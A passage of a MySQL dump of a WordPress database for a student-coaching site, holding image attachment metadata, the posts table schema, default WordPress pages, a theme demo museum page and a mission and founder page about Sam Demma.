";s:8:\"keywords\";a:0:{}}}'),(1700,2151,'_wpb_shortcodes_custom_css','.vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}'),(1701,2152,'_wp_attached_file','2021/02/Untitled-design-85.png'),(1702,2152,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-85.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-85-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-85-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-85-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-85-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-85-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1703,2153,'_wp_attached_file','2021/02/Untitled-design-86.png'),(1704,2153,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-86.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-86-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-86-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-86-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-86-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-86-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1705,2154,'_wp_attached_file','2021/02/Untitled-design-87.png'),(1706,2154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-87.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-87-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-87-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-87-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:31:\"Untitled-design-87-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-880x587.png\";s:5:\"width\";i:880;s:6:\"height\";i:587;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:30:\"Untitled-design-87-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1707,2155,'_wpb_shortcodes_custom_css','.vc_custom_1612191669997{padding-top: 237px !important;padding-bottom: 237px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-80-1.png?id=2142) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}');
/*!40000 ALTER TABLE `wpii_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_posts`
--

DROP TABLE IF EXISTS `wpii_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=2157 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_posts`
--

LOCK TABLES `wpii_posts` WRITE;
/*!40000 ALTER TABLE `wpii_posts` DISABLE KEYS */;
INSERT INTO `wpii_posts` VALUES (1,1,'2020-10-28 12:21:43','2020-10-28 12:21:43','<!-- wp:paragraph -->\n<p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>\n<!-- /wp:paragraph -->','Hello world!','','publish','open','open','','hello-world','','','2020-10-28 12:21:43','2020-10-28 12:21:43','',0,'http://highperformingstudent.com/?p=1',0,'post','',1),(2,1,'2020-10-28 12:21:43','2020-10-28 12:21:43','<!-- wp:paragraph -->\n<p>This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>...or something like this:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>As a new WordPress user, you should go to <a href=\"http://highperformingstudent.com/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!</p>\n<!-- /wp:paragraph -->','Sample Page','','publish','closed','open','','sample-page','','','2020-10-28 12:21:43','2020-10-28 12:21:43','',0,'http://highperformingstudent.com/?page_id=2',0,'page','',0),(3,1,'2020-10-28 12:21:43','2020-10-28 12:21:43','<!-- wp:heading --><h2>Who we are</h2><!-- /wp:heading --><!-- wp:paragraph --><p>Our website address is: http://highperformingstudent.com.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What personal data we collect and why we collect it</h2><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Comments</h3><!-- /wp:heading --><!-- wp:paragraph --><p>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor&#8217;s IP address and browser user agent string to help spam detection.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Media</h3><!-- /wp:heading --><!-- wp:paragraph --><p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Contact forms</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Cookies</h3><!-- /wp:heading --><!-- wp:paragraph --><p>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select &quot;Remember Me&quot;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Embedded content from other websites</h3><!-- /wp:heading --><!-- wp:paragraph --><p>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Analytics</h3><!-- /wp:heading --><!-- wp:heading --><h2>Who we share your data with</h2><!-- /wp:heading --><!-- wp:heading --><h2>How long we retain your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Where we send your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>Visitor comments may be checked through an automated spam detection service.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Your contact information</h2><!-- /wp:heading --><!-- wp:heading --><h2>Additional information</h2><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>How we protect your data</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What data breach procedures we have in place</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What third parties we receive data from</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What automated decision making and/or profiling we do with user data</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Industry regulatory disclosure requirements</h3><!-- /wp:heading -->','Privacy Policy','','draft','closed','open','','privacy-policy','','','2020-10-28 12:21:43','2020-10-28 12:21:43','',0,'http://highperformingstudent.com/?page_id=3',0,'page','',0),(2149,1,'2021-02-01 15:30:48','2021-02-01 15:30:48','','Untitled design (83)','','inherit','open','closed','','untitled-design-83','','','2021-02-01 15:30:48','2021-02-01 15:30:48','',623,'http://highperformingstudent.com/wp-content/uploads/2021/02/Untitled-design-83.png',0,'attachment','image/png',0),(5,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','','The New UMoMA Opens its Doors','','inherit','open','closed','','the-new-umoma-opens-its-doors','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/wp-content/uploads/2020/10/2020-landscape-1.png',0,'attachment','image/png',0),(6,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','<!-- wp:group {\"align\":\"wide\"} --><div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\"} --><h2 class=\"has-text-align-center\">The premier destination for modern art in Northern Sweden. Open from 10 AM to 6 PM every day during the summer months.</h2><!-- /wp:heading --></div></div><!-- /wp:group --><!-- wp:columns {\"align\":\"wide\"} --><div class=\"wp-block-columns alignwide\"><!-- wp:column --><div class=\"wp-block-column\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>Works and Days</h3><!-- /wp:heading --><!-- wp:paragraph --><p>August 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>Theatre of Operations</h3><!-- /wp:heading --><!-- wp:paragraph --><p>October 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div><!-- /wp:column --><!-- wp:column --><div class=\"wp-block-column\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>The Life I Deserve</h3><!-- /wp:heading --><!-- wp:paragraph --><p>August 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>From Signac to Matisse</h3><!-- /wp:heading --><!-- wp:paragraph --><p>October 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div><!-- /wp:column --></div><!-- /wp:columns --><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:group {\"align\":\"wide\"} --><div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\",\"textColor\":\"accent\"} --><h2 class=\"has-accent-color has-text-align-center\">&#8220;Cyborgs, as the philosopher Donna Haraway established, are not reverent. They do not remember the cosmos.&#8221;</h2><!-- /wp:heading --></div></div><!-- /wp:group --><!-- wp:paragraph {\"dropCap\":true} --><p class=\"has-drop-cap\">With seven floors of striking architecture, UMoMA shows exhibitions of international contemporary art, sometimes along with art historical retrospectives. Existential, political and philosophical issues are intrinsic to our programme. As visitor you are invited to guided tours artist talks, lectures, film screenings and other events with free admission</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>The exhibitions are produced by UMoMA in collaboration with artists and museums around the world and they often attract international attention. UMoMA has received a Special Commendation from the European Museum of the Year, and was among the top candidates for the Swedish Museum of the Year Award as well as for the Council of Europe Museum Prize.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p></p><!-- /wp:paragraph --><!-- wp:group {\"customBackgroundColor\":\"#ffffff\",\"align\":\"wide\"} --><div class=\"wp-block-group alignwide has-background\" style=\"background-color:#ffffff\"><div class=\"wp-block-group__inner-container\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\"} --><h2 class=\"has-text-align-center\">Become a Member and Get Exclusive Offers!</h2><!-- /wp:heading --><!-- wp:paragraph {\"align\":\"center\"} --><p class=\"has-text-align-center\">Members get access to exclusive exhibits and sales. Our memberships cost $99.99 and are billed annually.</p><!-- /wp:paragraph --><!-- wp:button {\"align\":\"center\"} --><div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Join the Club</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div></div><!-- /wp:group --><!-- wp:gallery {\"ids\":[39,38],\"align\":\"wide\"} --><figure class=\"wp-block-gallery alignwide columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-2.png\" alt=\"\" data-id=\"39\" data-full-url=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-2.png\" data-link=\"assets/images/2020-square-2/\" class=\"wp-image-39\"/></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-1.png\" alt=\"\" data-id=\"38\" data-full-url=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-1.png\" data-link=\"http://highperformingstudent.com/wp-content/themes/twentytwenty/assets/images/2020-square-1/\" class=\"wp-image-38\"/></figure></li></ul></figure><!-- /wp:gallery -->','The New UMoMA Opens its Doors','','publish','closed','closed','','the-new-umoma-opens-its-doors-2','','','2020-10-28 12:30:59','2020-10-28 12:30:59','',0,'http://highperformingstudent.com/?page_id=6',0,'page','',0),(7,1,'2020-10-28 12:30:59','2020-10-28 12:30:59','[vc_row][vc_column width=\"1/6\"][/vc_column][vc_column width=\"2/3\"][vc_custom_heading text=\"OUR MISSION\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]\r\n<p style=\"text-align: center;\">Through the development of six key skills, we help students max out their potential <span style=\"font-weight: 400;\">to live a healthy, happier and more productive life. </span>We accomplish this through our <a href=\"http://highperformingstudent.com/podcast/\">podcast</a>, <a href=\"http://highperformingstudent.com/book/\">book</a>, <a href=\"http://highperformingstudent.com/speaking/\">self-leadership seminars</a>, and <a href=\"http://highperformingstudent.com/courses/\">modular online courses</a>.</p>\r\n<!-- /wp:paragraph -->[/vc_column_text][/vc_column][vc_column width=\"1/6\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"double\" border_width=\"3\"][/vc_column][/vc_row][vc_row content_placement=\"middle\"][vc_column width=\"1/2\"][vc_custom_heading text=\"OUR FOUNDER\" font_container=\"tag:h1|font_size:4.5rem|text_align:center|color:%23333333|line_height:1.5\" google_fonts=\"font_family:Roboto%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic|font_style:900%20bold%20regular%3A900%3Anormal\"][vc_column_text]At 21 years old, entrepreneur, youth coach, and keynote speaker Sam Demma doesn’t let his age define his drive or credibility.  His goal is to provide students with the tools and strategies they need to become the change-makers in their schools, businesses, communities, and in the lives of those around them.  And it all started with…garbage.  At the age of 17, he co-founded <a href=\"http://www.pickwaste.com\">PickWaste</a>, a grassroots initiative that brings people together to pick up trash in their communities.  After filling nearly 2000 bags of litter, Sam was convinced that small actions can have a big impact, and he lives that message in all he does.\r\n\r\nIn a few short years, his presentations have reached thousands of students across Canada and his programs have made a difference for young people in 6 countries around the world.  He’s delivered two <a href=\"https://www.ted.com/talks/sam_demma_small_consistent_actions\">TEDx talks</a>, he is the youngest Professional member of the Canadian Association of Professional Speakers, and there’s no limit to where small actions will take this big thinker.[/vc_column_text][button label=\"More About Sam\" size=\"large\" align=\"center\" url=\"www.samdemma.com\" undefined=\"\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"2052\" img_size=\"full\" 